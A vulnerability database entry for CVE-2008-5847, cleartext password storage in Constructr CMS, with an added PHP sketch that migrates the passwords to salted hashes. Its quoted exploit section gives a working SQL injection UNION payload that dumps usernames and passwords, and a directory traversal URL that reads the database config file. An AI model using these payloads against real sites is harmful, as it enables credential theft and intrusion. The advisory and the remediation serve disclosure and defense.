constructr constructr-cms trust management vulnerability

Vulnerability ID: 1117088; Vulnerability type: Trust management
Published: 2008-12-19; Updated: 2009-01-05
CVE ID: CVE-2008-5847; CNNVD-ID: CNNVD-200901-035
Platform: PHP; CVSS score: 2.6
|Vulnerability source
https://www.exploit-db.com/exploits/7529
https://www.securityfocus.com/bid/80783
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-035
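|Vulnerability details
Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.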
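
A remediation sketch for the cleartext storage described above, added here as an example and not taken from Constructr CMS or the advisory. The table and column names (`constructr_user`, `username`, `hash`) follow the advisory; the function names, the in-memory SQLite database and the sample account are assumptions made for the demonstration.

```php
<?php
// Added example. Table and column names follow the advisory; the SQLite
// in-memory database and the sample account are constructed for the demo.

// One-off migration: because the legacy column holds the cleartext itself,
// every row can be converted immediately, without waiting for a login.
function migrate_cleartext_rows(PDO $db): int
{
    $rows = $db->query('SELECT username, hash FROM constructr_user')
               ->fetchAll(PDO::FETCH_ASSOC);
    $update = $db->prepare('UPDATE constructr_user SET hash = ? WHERE username = ?');
    $converted = 0;
    foreach ($rows as $row) {
        // Skip rows already in a password_hash() format, so a re-run is safe.
        if (!empty(password_get_info($row['hash'])['algo'])) {
            continue;
        }
        $update->execute([password_hash($row['hash'], PASSWORD_DEFAULT), $row['username']]);
        $converted++;
    }
    return $converted;
}

// Login check: bound parameter for the lookup, password_verify() for the
// comparison against the stored salted hash.
function check_login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT hash FROM constructr_user WHERE username = ?');
    $stmt->execute([$username]);
    $stored = $stmt->fetchColumn();
    return is_string($stored) && password_verify($password, $stored);
}

// Constructed demo data: one legacy account stored in cleartext.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE constructr_user (username TEXT PRIMARY KEY, hash TEXT)');
$db->exec("INSERT INTO constructr_user VALUES ('editor', 'constructed-sample-pw')");

echo migrate_cleartext_rows($db), " row(s) converted\n";
var_dump(check_login($db, 'editor', 'constructed-sample-pw'));
var_dump(check_login($db, 'editor', 'wrong-guess'));
```

On a real MySQL schema the `hash` column has to be wide enough for the output of `password_hash()`; the PHP manual recommends 255 characters for `PASSWORD_DEFAULT`.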
|Exploit
Constructr CMS
http://constructr-cms.org/

- <= 3.02.5 "Stable" -

magic_quotes_gpc = Off
register_globals = On

- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=

Db info:
../config/config.inc.php


- SQL -
http://site/constructr/?show_page=

User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...


- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-19]
|Affected products
Constructr Constructr-Cms 3.2.5 Constructr Constructr-Cms 3.02.4 Constructr Constructr-Cms 3.02.3 Constructr Constructr-Cms 3.02.2 Constructr Constructr-Cms 3.02.1 Constr
|References

Source: MILW0RM
Name: 7529
Link: http://www.milw0rm.com/exploits/7529
Source: SREASON
Name: 4868
Link: http://securityreason.com/securityalert/4868